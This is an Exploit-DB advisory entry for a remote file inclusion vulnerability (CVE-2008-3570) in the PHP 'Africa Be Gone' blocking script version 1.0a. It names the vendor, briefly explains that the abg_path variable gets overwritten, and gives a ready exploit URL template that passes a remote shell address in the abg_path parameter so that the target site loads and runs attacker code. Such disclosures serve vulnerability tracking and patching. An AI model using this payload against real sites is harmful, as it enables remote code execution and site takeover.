ABG Blocking Script 1.0a abg_path Remote File Inclusion Vulnerability

2008-08-01T00:00:00
ID EDB-ID:6183
Type exploitdb
Reporter Lo$er
Modified 2008-08-01T00:00:00

Description

ABG Blocking Script 1.0a (abg_path) Remote File Inclusion Vulnerability. CVE-2008-3570. Webapps exploit for php platform

                                        
                                            =================================================================
========Africa Be Gone version 1.0a Remote File Inclusion========
=================================================================

Vendor: http://www.africabegone.com
Download: http://www.africabegone.com/includes/downloads/index.php?file=1&sort=1
Discovered: 7-31-08
Discovered By: Lo$er

====Vulnerable code====

$abg_path is initilizied but overwritten later down the road.

====RFI====

http://www.[site].com/[abg path]/index.php?abg_path=[shell]?

# milw0rm.com [2008-08-01]